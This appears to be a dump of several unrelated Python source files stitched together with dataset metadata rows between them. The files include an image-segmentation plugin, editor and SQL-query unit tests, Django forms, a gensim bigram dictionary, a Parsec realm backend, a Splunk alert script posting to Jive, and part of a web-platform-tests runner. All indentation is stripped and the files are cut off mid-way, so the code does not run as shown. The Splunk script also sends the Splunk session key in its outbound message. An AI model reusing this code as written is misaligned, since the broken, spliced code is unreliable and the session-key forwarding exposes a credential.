#from segmentorWSit import SegmentorWSiter
ok = False
try:
import vigra.tws
ok = True
except Exception, e:
pass
if 0:
#*******************************************************************************
# S e g m e n t o r S V 2 *
#*******************************************************************************
class SegmentorSV2(SegmentorBase):
name = "Supervoxel Segmentation 2"
description = "Segmentation plugin using sparse Basin graph"
author = "HCI, University of Heidelberg"
homepage = "http://hci.iwr.uni-heidelberg.de"
bias = Float(64*8)
biasedLabel = Int(1)
maxHeight = Float(1024)
view = View( Item('bias'), Item('maxHeight'), Item('biasedLabel'), buttons = ['OK', 'Cancel'], )
#*******************************************************************************
# I n d e x e d A c c e s s o r *
#*******************************************************************************
class IndexedAccessor:
"""
Helper class that behaves like an ndarray, but does a Lookuptable access
"""
def __init__(self, volumeBasins, basinLabels):
self.volumeBasins = volumeBasins
self.basinLabels = basinLabels
self.dtype = basinLabels.dtype
self.shape = volumeBasins.shape
def __getitem__(self, key):
return self.basinLabels[self.volumeBasins[tuple(key)]]
def __setitem__(self, key, data):
#self.data[tuple(key)] = data
print "##########ERROR ######### : SegmentationDataAccessor setitem should not be called"
def segment3D(self, labelVolume, labelValues, labelIndices):
self.ws.setBias(self.bias, self.biasedLabel, self.maxHeight)
self.basinLabels = self.ws.flood(labelValues, labelIndices)
self.acc = SegmentorWSiter.IndexedAccessor(self.volumeBasins, self.basinLabels)
return self.acc
def segment2D(self, labels):
#TODO: implement
return labelVolume
def setupWeights(self, weights):
print "Incoming weights :", weights.shape
#self.weights = numpy.average(weights, axis = 3).astype(numpy.uint8)#.swapaxes(0,2).view(vigra.ScalarVolume)#
if weights.dtype != numpy.uint8:
print "converting weights to uint8"
self.weights = weights.astype(numpy.uint8)
# self.weights = numpy.zeros(weights.shape[0:-1], 'uint8')
# self.weights[:] = 3
# self.weights[:,:,0::4] = 10
# self.weights[:,0::4,:] = 10
# self.weights[0::4,:,:] = 10
# self.weights = self.weights
self.ws = vigra.tws.IncrementalWS2(self.weights)
self.volumeBasins = self.ws.getVolumeBasins() #WithBorders()
print "Outgoing weights :", self.volumeBasins.shape
self.volumeBasins.shape = self.volumeBasins.shape + (1,)
| bsd-2-clause | 8,846,247,614,698,652,000 | 43.070175 | 121 | 0.592357 | false | 4.239662 | false | false | false |
again4you/retext | tests/test_editor.py | 3 | 2873 | # This file is part of ReText
# Copyright: 2014 Dmitry Shachnev
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from ReText.editor import documentIndentMore, documentIndentLess
from PyQt5.QtGui import QTextCursor, QTextDocument
class SettingsMock:
tabWidth = 4
tabInsertsSpaces = True
class TestIndentation(unittest.TestCase):
def setUp(self):
self.document = QTextDocument()
self.document.setPlainText('foo\nbar\nbaz')
self.settings = SettingsMock()
def test_indentMore(self):
cursor = QTextCursor(self.document)
cursor.setPosition(4)
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('foo\n bar\nbaz',
self.document.toPlainText())
cursor.setPosition(3)
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('foo \n bar\nbaz',
self.document.toPlainText())
def test_indentMoreWithTabs(self):
cursor = QTextCursor(self.document)
self.settings.tabInsertsSpaces = False
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('\tfoo\nbar\nbaz', self.document.toPlainText())
def test_indentMoreWithSelection(self):
cursor = QTextCursor(self.document)
cursor.setPosition(1)
cursor.setPosition(6, QTextCursor.KeepAnchor)
self.assertEqual('oo\u2029ba', # \u2029 is paragraph separator
cursor.selectedText())
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual(' foo\n bar\nbaz',
self.document.toPlainText())
def test_indentLess(self):
self.document.setPlainText(' foo')
cursor = QTextCursor(self.document)
cursor.setPosition(10)
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual(' foo', self.document.toPlainText())
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual('foo', self.document.toPlainText())
def test_indentLessWithSelection(self):
self.document.setPlainText(' foo\n bar\nbaz')
cursor = QTextCursor(self.document)
cursor.setPosition(5)
cursor.setPosition(11, QTextCursor.KeepAnchor)
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual('foo\nbar\nbaz', self.document.toPlainText())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -1,381,616,808,012,160,800 | 36.311688 | 71 | 0.741733 | false | 3.482424 | true | false | false |
sqlviz/sqlviz | tests/unit/test_query.py | 1 | 2690 | from unittest import TestCase
import website.query
import pandas as pd
import json
class TestLimits(TestCase):
def test_adding_simple_limits(self):
query = website.query.Query(
query_text="select * from some_table",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 1000;")
def test_semicolon_limits(self):
query = website.query.Query(
query_text="select * from some_table;",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 1000;")
def test_limit_already_exists(self):
query = website.query.Query(
query_text="select * from some_table limit 10",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 10")
def test_limit_semicolon_already_exists(self):
query = website.query.Query(
query_text="select * from some_table limit 10;",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 10;")
class TestSafety(TestCase):
    def test_stop_words(self):
base_query = "select * from some_table"
stop_words = ['insert', 'delete', 'drop',
'truncate', 'alter', 'grant']
for word in stop_words:
query = website.query.Query(
query_text="%s %s " % (word, base_query),
db=1)
self.assertRaises(TypeError, query.check_safety)
class TestManipulateData(TestCase):
"""def test_numericalize_data_array(self):
md = website.query.ManipulateData(
query_text='',
db='')
md.data_array = [['a', '3', '4.0', '2014-01-02']]
return_array = md.numericalize_data_array()
self.assertListEqual(return_array, [['a', 3, 4.0, '2014-01-02']])
"""
def test_pivot(self):
md = website.query.ManipulateData(
query_text='',
db='')
test_data = {
'col1': ['cat', 'dog', 'cat', 'bear'],
'col2': ['summer', 'summer', 'winter', 'winter'],
'val': [1, 2, 3, 4]}
md.data = pd.DataFrame(test_data)
return_data = json.loads(md.pivot().to_json())
self.assertDictEqual(
return_data,
{
"col1": {"0": "bear", "1": "cat", "2": "dog"},
"summer": {"0": 0.0, "1": 1.0, "2": 2.0},
"winter": {"0": 4.0, "1": 3.0, "2": 0.0}
})
| mit | -8,957,055,358,823,039,000 | 31.409639 | 73 | 0.514498 | false | 3.695055 | true | false | false |
osamak/student-portal | arshidni/forms.py | 2 | 4567 | # -*- coding: utf-8 -*-
from arshidni.models import GraduateProfile, Question, Answer, StudyGroup, LearningObjective, JoinStudyGroupRequest, ColleagueProfile, SupervisionRequest
from django import forms
class GraduateProfileForm(forms.ModelForm):
class Meta:
model = GraduateProfile
fields = ['contacts', 'bio', 'interests',
'answers_questions', 'gives_lectures']
class QuestionForm(forms.ModelForm):
class Meta:
model = Question
fields = ['text']
class AnswerForm(forms.ModelForm):
class Meta:
model = Answer
fields = ['text']
class StudyGroupForm(forms.ModelForm):
class Meta:
model = StudyGroup
fields = ['name', 'starting_date', 'ending_date',
'max_members']
def clean(self):
cleaned_data = super(StudyGroupForm, self).clean()
if 'starting_date' in cleaned_data and 'ending_date' in cleaned_data:
if cleaned_data['starting_date'] > cleaned_data['ending_date']:
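                # Arabic: "the period's end date is before its start date!"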
msg = u'تاريخ انتهاء المدة قبل تاريخ بدئها!'
self._errors["starting_date"] = self.error_class([msg])
self._errors["ending_date"] = self.error_class([msg])
# Remove invalid fields
del cleaned_data["starting_date"]
del cleaned_data["ending_date"]
new_learningobjective_fields = [field for field in self.data if field.startswith('new_learningobjective-')]
existing_learningobjective_fields = [field for field in self.data if field.startswith('existing_learningobjective-')]
for field_name in new_learningobjective_fields:
text = self.data[field_name].strip()
if not text: # if empty
continue
cleaned_data[field_name] = self.data[field_name]
for field_name in existing_learningobjective_fields:
text = self.data[field_name].strip()
if not text: # if empty
continue
cleaned_data[field_name] = self.data[field_name]
return cleaned_data
def clean_max_members(self):
"Define max_members range."
# TODO: Move this hard-coded number into a Django setting.
# The maximum number of students in each group is 8.
max_members = self.cleaned_data["max_members"]
if max_members > 8:
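            # Arabic: "the group cannot have more than 8 members!"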
msg = u'لا يمكن أن يكون عدد أعضاء المجموعة أكثر من 8!'
self._errors["max_members"] = self.error_class([msg])
elif max_members < 3:
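            # Arabic: "the group cannot have fewer than 3 members!"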
msg = u'لا يمكن أن يكون عدد أعضاء المجموعة أقل من 3!'
self._errors["max_members"] = self.error_class([msg])
return max_members
def save(self, *args, **kwargs):
group = super(StudyGroupForm, self).save(*args, **kwargs)
remaining_pk = [] # List of kept learning objects (whether
# modified or not)
new_learningobjective_fields = [field for field in self.cleaned_data if field.startswith('new_learningobjective-')]
existing_learningobjective_fields = [field for field in self.cleaned_data if field.startswith('existing_learningobjective-')]
for field_name in new_learningobjective_fields:
text = self.cleaned_data[field_name]
new_learningobjective = LearningObjective.objects.create(group=group,text=text)
remaining_pk.append(new_learningobjective.pk)
for field_name in existing_learningobjective_fields:
            # note: str.lstrip removes a character set, not a prefix, so slice
            # off the prefix instead
            pk_str = field_name[len("existing_learningobjective-"):]
pk = int(pk_str)
remaining_pk.append(pk)
text = self.cleaned_data[field_name]
existing_learningobjective = LearningObjective.objects.get(pk=pk)
existing_learningobjective.text = text
existing_learningobjective.save()
deleted_learningobjectives = LearningObjective.objects.exclude(pk__in=remaining_pk).filter(group=group)
for deleted_learningobjective in deleted_learningobjectives:
print "Deleting", deleted_learningobjective.text
deleted_learningobjective.delete()
return group
class ColleagueProfileForm(forms.ModelForm):
class Meta:
model = ColleagueProfile
fields = ['batch', 'contacts', 'bio', 'interests', 'tags']
class SupervisionRequestForm(forms.ModelForm):
class Meta:
model = SupervisionRequest
fields = ['batch', 'contacts', 'interests']
| agpl-3.0 | 4,208,945,619,795,110,400 | 42.407767 | 153 | 0.63431 | false | 3.89121 | false | false | false |
lum4chi/mygensim | corpora/bidictionary.py | 1 | 8483 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Francesco Lumachi <[email protected]>
from __future__ import division
from gensim import corpora, utils
from six import iteritems, itervalues, iterkeys
from collections import defaultdict
from itertools import tee, izip
from scipy.stats import rv_discrete
class Bidictionary(utils.SaveLoad):
    # TODO: not all methods of a gensim Dictionary are implemented here!
"""
This object provide a convenient way to parse document (seen as list of tokens
in appearance order!) while extracting bigrams frequencies, returning gensim-like
"bag-of-bigrams" vector, which in features (bi-tokens) are identified by a tuple
(firstId, secondId).
Ex: bd = Bidictionary(documents=<some_corpus>)
bd[<token_id>] # return id->plain_token (from corpora.Dictionary)
bd.token2id[<token>] # return plain_token->id (from corpora.Dictionary)
            bd.fid_sid2bid[<firstId>, <secondId>] # return tokenid, tokenid -> bitokenid
bd.dfs[bitokenid] # return document frequency of bitoken
"""
def __init__(self, documents=None, prune_at=2000000, doc_start='^', doc_end='$'):
"""
Choose doc_start, doc_end to some char ignore by tokenizer, otherwise statistics
about start/end token will be compromised.
"""
self._unidict = corpora.Dictionary()
# add dummy doc to map start/end chars (will produce len(unidict)+1: nevermind)
self._unidict.doc2bow([doc_start, doc_end], allow_update=True)
self.doc_start, self.doc_end = doc_start, doc_end
# Statistics gensim-like
self.fid_sid2bid = {} # (firstid, secondid) -> tokenId
self.bid2fid_sid = {} # TODO: reverse mapping for fid_sid2bid; only formed on request, to save memory
self.dfs = {} # document frequencies: tokensId -> in how many documents those tokens appeared
self.num_pos = 0 # total number of corpus positions
self.num_nnz = 0 # total number of non-zeroes in the BOW matrix
if documents is not None:
self.add_documents(documents, prune_at=prune_at)
num_docs = property(lambda self: self._unidict.num_docs - 1) # 1 is the dummy doc ['^','$']
def doc2bob(self, document, allow_update=False, return_missing=False):
""" Document tokens are parsed pairwise to produce bag-of-bitokens features """
positional_doc = [self.doc_start] + document + [self.doc_end]
# Index single tokens
self._unidict.doc2bow(positional_doc, allow_update, return_missing)
# Construct ((firstid, secondid), frequency) mapping.
d1, d2 = tee(positional_doc)
next(d2, None) # step ahead second iterator
counter = defaultdict(int)
for first, second in izip(d1, d2):
# saving space using same indexes as unidict
try:
firstid = self._unidict.token2id[first]
secondid = self._unidict.token2id[second]
counter[firstid, secondid] += 1
except KeyError: # 1 or both token aren't indexed: skip.
continue
fid_sid2bid = self.fid_sid2bid
if allow_update or return_missing:
missing = dict((f_s, freq) for f_s, freq in iteritems(counter) if f_s not in fid_sid2bid)
if allow_update:
for w in missing:
# new id = number of ids made so far;
# NOTE this assumes there are no gaps in the id sequence!
fid_sid2bid[w] = len(fid_sid2bid)
result = dict((fid_sid2bid[w], freq) for w, freq in iteritems(counter) if w in fid_sid2bid)
if allow_update:
self.num_pos += sum(itervalues(counter))
self.num_nnz += len(result)
# increase document count for each unique token that appeared in the document
dfs = self.dfs
for bid in iterkeys(result):
dfs[bid] = dfs.get(bid, 0) + 1
# return tokensids, in ascending id order
result = sorted(iteritems(result))
if return_missing:
return result, missing
else:
return result
def add_documents(self, docs, prune_at=2000000):
for d in docs:
self.doc2bob(d, allow_update=True)
def tokens2bid(self, tokens):
"""
:param tokens: need to be a tuple ('a','b')
"""
fid, sid = self._unidict.token2id[tokens[0]], self._unidict.token2id[tokens[1]]
return self.fid_sid2bid[(fid, sid)]
def __getitem__(self, ids):
# If you want the frequency, you need to ask for a "bid" and then to self.dfs[bid]
if isinstance(ids, int): return self._unidict.__getitem__(ids) # tid -> 'token'
if isinstance(ids, str): return self._unidict.token2id[ids] # 'token' -> id
if isinstance(ids, tuple):
if isinstance(ids[0], int): return self.fid_sid2bid[ids] # fid, sid -> bid
if isinstance(ids[0], str): return self.tokens2bid(ids) # 'a', 'b' -> bid
def save_as_text(self, fname, sort_by_word=True):
"""
Save this Dictionary to a text file, in format:
`id[TAB]fid[TAB]sid[TAB]document frequency[NEWLINE]`
and _unidict has an usual gensim dictionary
"""
self._unidict.save_as_text(fname + '.index', sort_by_word)
with utils.smart_open(fname, 'wb') as fout:
# no word to display in bidict
for fid_sid, id in sorted(iteritems(self.fid_sid2bid)):
line = "%i\t%i\t%i\t%i\n" % (id, fid_sid[0], fid_sid[1], self.dfs.get(id, 0))
fout.write(utils.to_utf8(line))
@staticmethod
def load_from_text(fname):
"""
Load a previously stored Dictionary from a text file.
Mirror function to `save_as_text`.
"""
result = Bidictionary()
# restore _unidict as gensim dictionary
result._unidict = corpora.Dictionary.load_from_text(fname + '.index')
with utils.smart_open(fname) as f:
for lineno, line in enumerate(f):
line = utils.to_unicode(line)
try:
bid, fid, sid, docfreq = line[:-1].split('\t')
fid_sid = (int(fid), int(sid))
except Exception:
raise ValueError("invalid line in dictionary file %s: %s"
% (fname, line.strip()))
bid = int(bid)
if fid_sid in result.fid_sid2bid:
raise KeyError('token %s is defined as ID %d and as ID %d' % (fid_sid, bid, result.fid_sid2bid[fid_sid]))
result.fid_sid2bid[fid_sid] = bid
result.dfs[bid] = int(docfreq)
return result
def mle(self, estimated, given):
""" Compute Maximum Likelihood Estimation probability
to extract the second token given first. """
try:
firstid = self._unidict.token2id[given]
secondid = self._unidict.token2id[estimated]
return self.dfs[self.fid_sid2bid[firstid, secondid]] / self._unidict.dfs[firstid]
except KeyError:
return 0.0
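    # Hedged worked example: if the bitoken ('the', 'cat') occurs in 3 documents
    # and 'the' occurs in 12, mle('cat', given='the') returns 3/12 = 0.25.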
def mlebyids(self, estimated, given):
""" Compute Maximum Likelihood Estimation probability
to extract the second token id given first id. """
try:
return self.dfs[self.fid_sid2bid[given, estimated]] / self._unidict.dfs[given]
except KeyError:
return 0.0
def generate_text(self, seed, n):
""" Given a seed token, produce n likelihood tokens to follow. """
def nexttokenid(seedid):
candidates = [sid for fid, sid in self.fid_sid2bid.keys() if fid == seedid]
if len(candidates) == 0: raise StopIteration
probs = [self.mlebyids(probid, seedid) for probid in candidates]
return rv_discrete(values=(candidates, probs)).rvs()
seedid = self._unidict.token2id[seed]
text = [seed]
for n in range(0, n):
try:
seedid = nexttokenid(seedid)
text.append(self._unidict[seedid])
except StopIteration:
break
return ' '.join(text)
| gpl-3.0 | -1,737,981,581,561,137,000 | 43.413613 | 125 | 0.591536 | false | 3.798925 | false | false | false |
Scille/parsec-cloud | parsec/backend/memory/realm.py | 1 | 11618 | # Parsec Cloud (https://parsec.cloud) Copyright (c) AGPLv3 2016-2021 Scille SAS
import attr
import pendulum
from uuid import UUID
from typing import List, Dict, Optional, Tuple
from parsec.api.data import UserProfile
from parsec.api.protocol import DeviceID, UserID, OrganizationID
from parsec.backend.backend_events import BackendEvent
from parsec.backend.realm import (
MaintenanceType,
RealmGrantedRole,
BaseRealmComponent,
RealmRole,
RealmStatus,
RealmStats,
RealmAccessError,
RealmIncompatibleProfileError,
RealmAlreadyExistsError,
RealmRoleAlreadyGranted,
RealmNotFoundError,
RealmEncryptionRevisionError,
RealmParticipantsMismatchError,
RealmMaintenanceError,
RealmInMaintenanceError,
RealmNotInMaintenanceError,
)
from parsec.backend.user import BaseUserComponent, UserNotFoundError
from parsec.backend.message import BaseMessageComponent
from parsec.backend.memory.vlob import MemoryVlobComponent
from parsec.backend.memory.block import MemoryBlockComponent
@attr.s
class Realm:
status: RealmStatus = attr.ib(factory=lambda: RealmStatus(None, None, None, 1))
checkpoint: int = attr.ib(default=0)
granted_roles: List[RealmGrantedRole] = attr.ib(factory=list)
@property
def roles(self):
roles = {}
for x in sorted(self.granted_roles, key=lambda x: x.granted_on):
if x.role is None:
roles.pop(x.user_id, None)
else:
roles[x.user_id] = x.role
return roles
class MemoryRealmComponent(BaseRealmComponent):
def __init__(self, send_event):
self._send_event = send_event
self._user_component = None
self._message_component = None
self._vlob_component = None
self._block_component = None
self._realms = {}
self._maintenance_reencryption_is_finished_hook = None
def register_components(
self,
user: BaseUserComponent,
message: BaseMessageComponent,
vlob: MemoryVlobComponent,
block: MemoryBlockComponent,
**other_components,
):
self._user_component = user
self._message_component = message
self._vlob_component = vlob
self._block_component = block
def _get_realm(self, organization_id, realm_id):
try:
return self._realms[(organization_id, realm_id)]
except KeyError:
raise RealmNotFoundError(f"Realm `{realm_id}` doesn't exist")
async def create(
self, organization_id: OrganizationID, self_granted_role: RealmGrantedRole
) -> None:
assert self_granted_role.granted_by is not None
assert self_granted_role.granted_by.user_id == self_granted_role.user_id
assert self_granted_role.role == RealmRole.OWNER
key = (organization_id, self_granted_role.realm_id)
if key not in self._realms:
self._realms[key] = Realm(granted_roles=[self_granted_role])
await self._send_event(
BackendEvent.REALM_ROLES_UPDATED,
organization_id=organization_id,
author=self_granted_role.granted_by,
realm_id=self_granted_role.realm_id,
user=self_granted_role.user_id,
role=self_granted_role.role,
)
else:
raise RealmAlreadyExistsError()
async def get_status(
self, organization_id: OrganizationID, author: DeviceID, realm_id: UUID
) -> RealmStatus:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
return realm.status
async def get_stats(
self, organization_id: OrganizationID, author: DeviceID, realm_id: UUID
) -> RealmStats:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
blocks_size = 0
vlobs_size = 0
for value in self._block_component._blockmetas.values():
if value.realm_id == realm_id:
blocks_size += value.size
for value in self._vlob_component._vlobs.values():
if value.realm_id == realm_id:
vlobs_size += sum(len(blob) for (blob, _, _) in value.data)
return RealmStats(blocks_size=blocks_size, vlobs_size=vlobs_size)
async def get_current_roles(
self, organization_id: OrganizationID, realm_id: UUID
) -> Dict[UserID, RealmRole]:
realm = self._get_realm(organization_id, realm_id)
roles: Dict[UserID, RealmRole] = {}
for x in realm.granted_roles:
if x.role is None:
roles.pop(x.user_id, None)
else:
roles[x.user_id] = x.role
return roles
async def get_role_certificates(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
since: pendulum.DateTime,
) -> List[bytes]:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
if since:
return [x.certificate for x in realm.granted_roles if x.granted_on > since]
else:
return [x.certificate for x in realm.granted_roles]
async def update_roles(
self,
organization_id: OrganizationID,
new_role: RealmGrantedRole,
recipient_message: Optional[bytes] = None,
) -> None:
assert new_role.granted_by is not None
assert new_role.granted_by.user_id != new_role.user_id
        # The only way for an OUTSIDER to be OWNER is to create their own realm
        # (given they need one to store their user manifest).
try:
user = self._user_component._get_user(organization_id, new_role.user_id)
except UserNotFoundError:
raise RealmNotFoundError(f"User `{new_role.user_id}` doesn't exist")
if user.profile == UserProfile.OUTSIDER and new_role.role in (
RealmRole.MANAGER,
RealmRole.OWNER,
):
raise RealmIncompatibleProfileError(
"User with OUTSIDER profile cannot be MANAGER or OWNER"
)
realm = self._get_realm(organization_id, new_role.realm_id)
if realm.status.in_maintenance:
raise RealmInMaintenanceError("Data realm is currently under maintenance")
owner_only = (RealmRole.OWNER,)
owner_or_manager = (RealmRole.OWNER, RealmRole.MANAGER)
existing_user_role = realm.roles.get(new_role.user_id)
needed_roles: Tuple[RealmRole, ...]
if existing_user_role in owner_or_manager or new_role.role in owner_or_manager:
needed_roles = owner_only
else:
needed_roles = owner_or_manager
author_role = realm.roles.get(new_role.granted_by.user_id)
if author_role not in needed_roles:
raise RealmAccessError()
if existing_user_role == new_role.role:
raise RealmRoleAlreadyGranted()
realm.granted_roles.append(new_role)
await self._send_event(
BackendEvent.REALM_ROLES_UPDATED,
organization_id=organization_id,
author=new_role.granted_by,
realm_id=new_role.realm_id,
user=new_role.user_id,
role=new_role.role,
)
if recipient_message is not None:
await self._message_component.send(
organization_id,
new_role.granted_by,
new_role.user_id,
new_role.granted_on,
recipient_message,
)
async def start_reencryption_maintenance(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
encryption_revision: int,
per_participant_message: Dict[UserID, bytes],
timestamp: pendulum.DateTime,
) -> None:
realm = self._get_realm(organization_id, realm_id)
if realm.roles.get(author.user_id) != RealmRole.OWNER:
raise RealmAccessError()
if realm.status.in_maintenance:
            raise RealmInMaintenanceError(f"Realm `{realm_id}` already in maintenance")
if encryption_revision != realm.status.encryption_revision + 1:
raise RealmEncryptionRevisionError("Invalid encryption revision")
now = pendulum.now()
not_revoked_roles = set()
for user_id in realm.roles.keys():
user = await self._user_component.get_user(organization_id, user_id)
if not user.revoked_on or user.revoked_on > now:
not_revoked_roles.add(user_id)
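        # `^` is a symmetric difference: the per-participant messages must cover
        # exactly the realm's non-revoked members (no extras, none missing).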
if per_participant_message.keys() ^ not_revoked_roles:
raise RealmParticipantsMismatchError(
"Realm participants and message recipients mismatch"
)
realm.status = RealmStatus(
maintenance_type=MaintenanceType.REENCRYPTION,
maintenance_started_on=timestamp,
maintenance_started_by=author,
encryption_revision=encryption_revision,
)
self._vlob_component._maintenance_reencryption_start_hook(
organization_id, realm_id, encryption_revision
)
# Should first send maintenance event, then message to each participant
await self._send_event(
BackendEvent.REALM_MAINTENANCE_STARTED,
organization_id=organization_id,
author=author,
realm_id=realm_id,
encryption_revision=encryption_revision,
)
for recipient, msg in per_participant_message.items():
await self._message_component.send(organization_id, author, recipient, timestamp, msg)
async def finish_reencryption_maintenance(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
encryption_revision: int,
) -> None:
realm = self._get_realm(organization_id, realm_id)
if realm.roles.get(author.user_id) != RealmRole.OWNER:
raise RealmAccessError()
if not realm.status.in_maintenance:
raise RealmNotInMaintenanceError(f"Realm `{realm_id}` not under maintenance")
if encryption_revision != realm.status.encryption_revision:
raise RealmEncryptionRevisionError("Invalid encryption revision")
if not self._vlob_component._maintenance_reencryption_is_finished_hook(
organization_id, realm_id, encryption_revision
):
raise RealmMaintenanceError("Reencryption operations are not over")
realm.status = RealmStatus(
maintenance_type=None,
maintenance_started_on=None,
maintenance_started_by=None,
encryption_revision=encryption_revision,
)
await self._send_event(
BackendEvent.REALM_MAINTENANCE_FINISHED,
organization_id=organization_id,
author=author,
realm_id=realm_id,
encryption_revision=encryption_revision,
)
async def get_realms_for_user(
self, organization_id: OrganizationID, user: UserID
) -> Dict[UUID, RealmRole]:
user_realms = {}
for (realm_org_id, realm_id), realm in self._realms.items():
if realm_org_id != organization_id:
continue
try:
user_realms[realm_id] = realm.roles[user]
except KeyError:
pass
return user_realms
| agpl-3.0 | -1,742,722,794,959,625,700 | 35.649842 | 98 | 0.622224 | false | 4.038234 | false | false | false |
jivesoftware/jive-splunk-ssi-alerts | splunk/bin/jive.py | 1 | 1818 | import sys
import json
import requests
# creates outbound message from alert payload contents
# and attempts to send to the specified endpoint
def send_message(payload):
config = payload.get('configuration')
# Get the Tile Endpoint URL
jive_url = config.get('jive_url')
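    # NOTE (assumption): `jive_url` points at the Jive tile endpoint configured
    # for this Splunk alert action; only the config key name implies this.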
# create outbound JSON message body
body = json.dumps({
"app" : payload.get("app"),
"owner" : payload.get("owner"),
"results_file" : payload.get("results_file"),
"results_link" : payload.get("results_link"),
"server_host" : payload.get("server_host"),
"server_uri" : payload.get("server_uri"),
"session_key" : payload.get("session_key"),
"sid" : payload.get("sid"),
"search_name" : payload.get("search_name"),
"result" : payload.get("result"),
})
# create outbound request object
try:
headers = {"Content-Type": "application/json"}
result = requests.post(url=jive_url, data=body, headers=headers)
        # Log the HTTP status code together with the response body.
        print >>sys.stderr, "INFO Jive HTTP Response [%s] - [%s]" % (result.status_code, result.text)
except Exception, e:
print >> sys.stderr, "ERROR Error sending message: %s" % e
return False
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--execute":
try:
# retrieving message payload from splunk
raw_payload = sys.stdin.read()
payload = json.loads(raw_payload)
send_message(payload)
except Exception, e:
print >> sys.stderr, "ERROR Unexpected error: %s" % e
sys.exit(3)
else:
print >> sys.stderr, "FATAL Unsupported execution mode (expected --execute flag)"
sys.exit(1)
| apache-2.0 | 1,257,286,227,576,477,000 | 36.102041 | 94 | 0.587459 | false | 3.717791 | false | false | false |
mhaessig/servo | tests/wpt/web-platform-tests/tools/wpt/run.py | 2 | 13550 | import argparse
import os
import platform
import shutil
import subprocess
import sys
import tarfile
from distutils.spawn import find_executable
wpt_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.insert(0, os.path.abspath(os.path.join(wpt_root, "tools")))
from . import browser, utils, virtualenv
logger = None
class WptrunError(Exception):
pass
class WptrunnerHelpAction(argparse.Action):
def __init__(self,
option_strings,
dest=argparse.SUPPRESS,
default=argparse.SUPPRESS,
help=None):
super(WptrunnerHelpAction, self).__init__(
option_strings=option_strings,
dest=dest,
default=default,
nargs=0,
help=help)
def __call__(self, parser, namespace, values, option_string=None):
from wptrunner import wptcommandline
wptparser = wptcommandline.create_parser()
wptparser.usage = parser.usage
wptparser.print_help()
parser.exit()
def create_parser():
from wptrunner import wptcommandline
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("product", action="store",
help="Browser to run tests in")
parser.add_argument("--yes", "-y", dest="prompt", action="store_false", default=True,
help="Don't prompt before installing components")
parser.add_argument("--stability", action="store_true",
help="Stability check tests")
parser.add_argument("--install-browser", action="store_true",
help="Install the latest development version of the browser")
parser._add_container_actions(wptcommandline.create_parser())
return parser
def exit(msg):
logger.error(msg)
sys.exit(1)
def args_general(kwargs):
kwargs.set_if_none("tests_root", wpt_root)
kwargs.set_if_none("metadata_root", wpt_root)
kwargs.set_if_none("manifest_update", True)
if kwargs["ssl_type"] in (None, "pregenerated"):
cert_root = os.path.join(wpt_root, "tools", "certs")
if kwargs["ca_cert_path"] is None:
kwargs["ca_cert_path"] = os.path.join(cert_root, "cacert.pem")
if kwargs["host_key_path"] is None:
kwargs["host_key_path"] = os.path.join(cert_root, "web-platform.test.key")
if kwargs["host_cert_path"] is None:
kwargs["host_cert_path"] = os.path.join(cert_root, "web-platform.test.pem")
elif kwargs["ssl_type"] == "openssl":
if not find_executable(kwargs["openssl_binary"]):
            if platform.uname()[0] == "Windows":
raise WptrunError("""OpenSSL binary not found. If you need HTTPS tests, install OpenSSL from
https://slproweb.com/products/Win32OpenSSL.html
Ensure that its libraries are added to /bin, and add the resulting bin
directory to your PATH.
Otherwise run with --ssl-type=none""")
else:
raise WptrunError("""OpenSSL not found. If you don't need HTTPS support run with --ssl-type=none,
otherwise install OpenSSL and ensure that it's on your $PATH.""")
def check_environ(product):
if product not in ("firefox", "servo"):
expected_hosts = ["web-platform.test",
"www.web-platform.test",
"www1.web-platform.test",
"www2.web-platform.test",
"xn--n8j6ds53lwwkrqhv28a.web-platform.test",
"xn--lve-6lad.web-platform.test",
"nonexistent-origin.web-platform.test"]
missing_hosts = set(expected_hosts)
if platform.uname()[0] != "Windows":
hosts_path = "/etc/hosts"
else:
hosts_path = "C:\Windows\System32\drivers\etc\hosts"
with open(hosts_path, "r") as f:
for line in f:
line = line.split("#", 1)[0].strip()
parts = line.split()
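                # A usable entry is exactly "<ip> <hostname>"; comments and
                # multi-hostname lines are ignored by this check.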
if len(parts) == 2:
host = parts[1]
missing_hosts.discard(host)
if missing_hosts:
raise WptrunError("""Missing hosts file configuration. Expected entries like:
%s
See README.md for more details.""" % "\n".join("%s\t%s" %
("127.0.0.1" if "nonexistent" not in host else "0.0.0.0", host)
for host in expected_hosts))
class BrowserSetup(object):
name = None
browser_cls = None
def __init__(self, venv, prompt=True, sub_product=None):
self.browser = self.browser_cls()
self.venv = venv
self.prompt = prompt
self.sub_product = sub_product
def prompt_install(self, component):
if not self.prompt:
return True
while True:
resp = raw_input("Download and install %s [Y/n]? " % component).strip().lower()
if not resp or resp == "y":
return True
